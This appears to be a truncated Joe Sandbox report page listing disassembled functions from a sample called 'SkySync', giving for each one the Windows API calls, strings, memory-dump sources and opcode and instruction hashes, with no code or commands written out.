Instruction ID: e03bfb9e1651969645b82391812c8eed590e0e432874571e1065137e1c43eec0
Opcode Fuzzy Hash: 8ecf62e83e363feca1f74308ac70f8658b7a70b20e3e0ab02acf93d6e0c2d2ae
Instruction Fuzzy Hash: 2431827190021AAFCF10EF94C9819EEB7F4FF15314B108669F966976D1DB31AD05CB80

Function 00AE9A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AEB79A: GetClassNameW.USER32(?,?,000000FF), ref: 00AEB7BD

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00AE9ACC
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00AE9ADF
SendMessageW.USER32(?,00000189,?,00000000), ref: 00AE9B0F

Strings

ListBox, xrefs: 00AE9A8B
ComboBox, xrefs: 00AE9A56

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$ClassName
String ID: ComboBox$ListBox
API String ID: 787153527-1403004172
Opcode ID: ead97b67db27d1aa18463f9720065bf132d1a9752b4d82b49d9679e8deb05933
Instruction ID: 332dbc2145a09f4a9e5f01d9cef0ceadda606e680b82dde8755e6e17cd073176
Opcode Fuzzy Hash: ead97b67db27d1aa18463f9720065bf132d1a9752b4d82b49d9679e8deb05933
Instruction Fuzzy Hash: 9F213571A01204BEDB24EBA5DD86CFFB7BCDF56360F104119F825932E1DB38090A9760

Function 00B01EF9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00B01F18
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00B01F3E
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00B01F6E
InternetCloseHandle.WININET(00000000), ref: 00B01FB5

Part of subcall function 00B02B4F: GetLastError.KERNEL32(?,?,00B01EE3,00000000,00000000,00000001), ref: 00B02B64
Part of subcall function 00B02B4F: SetEvent.KERNEL32(?,?,00B01EE3,00000000,00000000,00000001), ref: 00B02B79

Strings

, xrefs: 00B01F5F

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: b965893ced2ee1de9522440e31312ff3057ec82f10ce0acc2c62b2262afdd983
Instruction ID: 424317ee63df7bce5cca9434a45954fc48df553b57b996b8ad9e29e832d7d7da
Opcode Fuzzy Hash: b965893ced2ee1de9522440e31312ff3057ec82f10ce0acc2c62b2262afdd983
Instruction Fuzzy Hash: EC21D1B1604209BFEB21AF24CCC5EBF7BEDEB48744F10459AF40597280EF649D059BA1

Function 00B16A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A92111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00A9214F
Part of subcall function 00A92111: GetStockObject.GDI32(00000011), ref: 00A92163
Part of subcall function 00A92111: SendMessageW.USER32(00000000,00000030,00000000), ref: 00A9216D

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00B16A86
LoadLibraryW.KERNEL32(?), ref: 00B16A8D
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00B16AA2
DestroyWindow.USER32(?), ref: 00B16AAA

Strings

SysAnimate32, xrefs: 00B16A61

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 84526834c5699d0aad0215544f6c540aed3e1bcbef3363b6b1416e6aa750221d
Instruction ID: f7c46d21209feb5c73a15e79764f423e02eedc65aa46f85171147bcf5fbd7bed
Opcode Fuzzy Hash: 84526834c5699d0aad0215544f6c540aed3e1bcbef3363b6b1416e6aa750221d
Instruction Fuzzy Hash: 64218871220205AFEF208FA49C80EFB77E9EF59324F908668FA50A3190D7319C919760

Function 00AF7357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00AF7377
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AF73AA
GetStdHandle.KERNEL32(0000000C), ref: 00AF73BC
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00AF73F6

Strings

nul, xrefs: 00AF73F1

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 3fe8e9e37289c38fa6d11d016a5cdf43de34f749eddba29aa0cc679e22758bd3
Instruction ID: 68628976b9745345dc415ee6aeb48a209b120f8ffe5e93555bb9b7492654e672
Opcode Fuzzy Hash: 3fe8e9e37289c38fa6d11d016a5cdf43de34f749eddba29aa0cc679e22758bd3
Instruction Fuzzy Hash: 1921817550830EABDB209FA9DC05AAE7BB4AF44720F204B19FEA0DB2E1D770D851DB50

Function 00AF7425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AF7444
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00AF7476
GetStdHandle.KERNEL32(000000F6), ref: 00AF7487
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00AF74C1

Strings

nul, xrefs: 00AF74BC

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 85520d3643b0b56e4708f067effc5ff4372f0772099599c589ca709187458661
Instruction ID: dcae3c4fb2ef5a7c7bf49aed5aee21ebad6a8c2f2f3a44a261c2f3f9be00efb3
Opcode Fuzzy Hash: 85520d3643b0b56e4708f067effc5ff4372f0772099599c589ca709187458661
Instruction Fuzzy Hash: 8221A4315083099BDB209FA89C44EAD7BF8AF55731F204B19FAA0D72D1DB709851CB51

Function 00AF22E7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00AF2318

Strings

KEYS, xrefs: 00AF232F
APPEND, xrefs: 00AF2351
REMOVE, xrefs: 00AF231E
EXISTS, xrefs: 00AF2340

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: 79f29440d0e1f65d1ca236b7b3837fedc319aad46cf506df285a52ab7a1b6841
Instruction ID: 9ddfcd9dd17fc92ee37e1faf92bdb6a729946f50bfb667157b3170705b4d9be5
Opcode Fuzzy Hash: 79f29440d0e1f65d1ca236b7b3837fedc319aad46cf506df285a52ab7a1b6841
Instruction Fuzzy Hash: A3112E7091011C9FCF00EFA4D9519FEB7B8FF16344B108595EA1467292DB365A06DF50

Function 00AF9710 Relevance: 7.8, APIs: 5, Instructions: 322fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00AF9A0D
DeleteFileW.KERNEL32(?,?), ref: 00AF9AB6
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00AF9ACC
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AF9ADD
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00AF9AEF

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: ab43dfc7932927c6441da57a83f600a1a82ea755fa3944e7f4ccd5777ab59644
Instruction ID: c5236b8c2760e45f2351e9beb0b4e7c4853fd25f283a112d565a43ffa9ccadc2
Opcode Fuzzy Hash: ab43dfc7932927c6441da57a83f600a1a82ea755fa3944e7f4ccd5777ab59644
Instruction Fuzzy Hash: A8C14DB1D0021CAADF21DF95CD85AEFB7BDAF49340F0040AAF609E7151EB709A858F61

Function 00ACAEC3 Relevance: 7.8, APIs: 5, Instructions: 253COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,00B4D050,7FFFFFFF,00000000,?,00ACB196,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00ACAF72
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00ACB196,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00ACAFEC
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00ACB196,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00ACB067
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00ACB196,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00ACB080

Part of subcall function 00AB593C: RtlAllocateHeap.NTDLL(01020000,00000000,00000001,?,?,?,?,00AB1003,?,0000FFFF), ref: 00AB597F

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00ACB196,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00ACB0FD

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapInfo
String ID:
API String ID: 1443698708-0
Opcode ID: 5ed91113c6c8c7d65888cd392237952d9993fda9bd508b7dd894fac7d4a77c84
Instruction ID: e2be74e8d5601b0406d228206d1de96858d118778459064d79fa68d265ee44fe
Opcode Fuzzy Hash: 5ed91113c6c8c7d65888cd392237952d9993fda9bd508b7dd894fac7d4a77c84
Instruction Fuzzy Hash: 9F81D0B2E001199BDF209FA4D992FFF7BB9EF18314F16015DE869A7241E7328C0187A1

Function 00B071EE Relevance: 7.8, APIs: 5, Instructions: 250networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 00B072EB
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00B0730C
WSAGetLastError.WSOCK32(00000000), ref: 00B0731F
inet_ntoa.WSOCK32(?), ref: 00B07392
htons.WSOCK32(?,?,?,00000000,?), ref: 00B073D5

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: ErrorLasthtonsinet_ntoa
String ID:
API String ID: 2227131780-0
Opcode ID: 9096122b9e92d753125de4e930df4e805f3a576a3538900118107dba723ab3a5
Instruction ID: 4a3eb76a6a55f5a2d08413d8371453d46305ac7c09e609ae5d7915b31d93933e
Opcode Fuzzy Hash: 9096122b9e92d753125de4e930df4e805f3a576a3538900118107dba723ab3a5
Instruction Fuzzy Hash: EC81A071A48200ABD710EB24DD86E6FBBE8EF89714F104558F5559B2D2DF70ED02CB91

Function 00B0F23E Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B0F2F0
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B0F320
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B0F453
CloseHandle.KERNEL32(?), ref: 00B0F4D4

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: 912ee2e8f3c96dfcb02a1d3bf771275929cffff66729ca438bb46a4e1c4ee3a0
Instruction ID: 60b7f1f69c6a6c1d04308942ff554f2a2f57c6222a0623d23c555f40f7c442d0
Opcode Fuzzy Hash: 912ee2e8f3c96dfcb02a1d3bf771275929cffff66729ca438bb46a4e1c4ee3a0
Instruction Fuzzy Hash: 9A817E757043019FDB20EF28D982F2EB7E5AF48B14F14895DF9999B3D2DA70AC018B91

Function 00AEF688 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AEF6A2
VariantClear.OLEAUT32(00000013), ref: 00AEF714
VariantClear.OLEAUT32(00000000), ref: 00AEF76F
VariantClear.OLEAUT32(?), ref: 00AEF7E6
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00AEF814

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 09c20be7a04b2ae619a3f86f47f1616f590ee8cc99201bfddb74f34d47587584
Instruction ID: ed37a3e91e91cf2b52d0e66f40edc6d224269aad86f3dd0439e5d9143bfe48d6
Opcode Fuzzy Hash: 09c20be7a04b2ae619a3f86f47f1616f590ee8cc99201bfddb74f34d47587584
Instruction Fuzzy Hash: BA516CB5A00209EFDB14DF58C884AAAB7B8FF4C314B15856AED59DB305D730E911CFA0

Function 00B10697 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B1147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1040D,?,?), ref: 00B11491

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B1075D
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B1079C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B107E3
RegCloseKey.ADVAPI32(?,?), ref: 00B1080F
RegCloseKey.ADVAPI32(00000000), ref: 00B1081C

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: a280cb614718a366ee29f13a2373f528e5d57ac20c23b0257a8a19f993c61c0e
Instruction ID: 7d3366be4d61ebf605c8c4825c7f4a26d5da225b0d049f72139d34050da00157
Opcode Fuzzy Hash: a280cb614718a366ee29f13a2373f528e5d57ac20c23b0257a8a19f993c61c0e
Instruction Fuzzy Hash: 5C518A31218204AFD714EF64C981FAAB7E8FF88704F40895DF596872A2DB70ED85CB52

Function 00B0DFB1 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B0E010
GetProcAddress.KERNEL32(00000000,?), ref: 00B0E093
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B0E0AF
GetProcAddress.KERNEL32(00000000,?), ref: 00B0E0F0
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B0E10A

Part of subcall function 00AA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00AF7E51,?,?,00000000), ref: 00AA4041
Part of subcall function 00AA402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00AF7E51,?,?,00000000,?,?), ref: 00AA4065

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 105d04442ffe51170eb903af77c6aa86a87a6b56229344594113ebe4512ae1e8
Instruction ID: 71dc4efcf07f04b07e21f8d8efcd5d995190cd9348ca79f9a3ff067969077e19
Opcode Fuzzy Hash: 105d04442ffe51170eb903af77c6aa86a87a6b56229344594113ebe4512ae1e8
Instruction Fuzzy Hash: 6B513935A00209DFCB10EF68C9859ADBBF4FF09310B048499E925AB392DB71ED45CF51

Function 00AF29B1 Relevance: 7.6, APIs: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00AF2A4A
IsMenu.USER32(00000000), ref: 00AF2A6A
CreatePopupMenu.USER32 ref: 00AF2A9E
GetMenuItemCount.USER32(000000FF), ref: 00AF2AFC
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00AF2B2D

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID:
API String ID: 93392585-0
Opcode ID: 67230a2f7501cd02630a5bb6f5a11c8aabc7fcfbe58e6e5118925cc2ff9b568a
Instruction ID: 5463fd4358a5699950fa689c5aaa17f5647f7aabbeb8f6af3669ed787216dd9a
Opcode Fuzzy Hash: 67230a2f7501cd02630a5bb6f5a11c8aabc7fcfbe58e6e5118925cc2ff9b568a
Instruction Fuzzy Hash: 30519A70A0020EEBDF25DFA8D988BBEBBF4AF54314F104159FA119B2A1E7709D45CB51

Function 00AFEBB4 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00AFEC62
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00AFEC8B
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00AFECCA
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00AFECEF
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00AFECF7

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 25e0ac0026fa1de167d5c0053e882e39f53f88a04b46ab6aee10f1fbdf2c2fab
Instruction ID: 837927385a133e225a220825b3b7c5e3cd7d949fd5baa874cb1210cad7a026d6
Opcode Fuzzy Hash: 25e0ac0026fa1de167d5c0053e882e39f53f88a04b46ab6aee10f1fbdf2c2fab
Instruction Fuzzy Hash: 64510A39A00509DFCF11EFA4CA85DAEBBF5EF48314B148095F909AB362DB31AD51DB50

Function 00B1A67B Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.168254505076.0000000000A91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000013.00000002.168254479329.0000000000A90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254652134.0000000000B46000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254735984.0000000000B50000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000013.00000002.168254766763.0000000000B59000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_a90000_SkySync.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c49899e663180c3d98e560d91ee0e692a09836d78271ed4748e6e56e1dbabc8
Instruction ID: eabe4722313d7dafcbe8834be072fed5df95752689c4e8b561ed7ffa6937dd79
Opcode Fuzzy Hash: 9c49899e663180c3d98e560d91ee0e692a09836d78271ed4748e6e56e1dbabc8
Instruction Fuzzy Hash: 7D41C435906114AFD720DB24CC88FE9BBF4EB09310F9401D5E916A72D2CB70BE81DB51

Function 00A92714 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

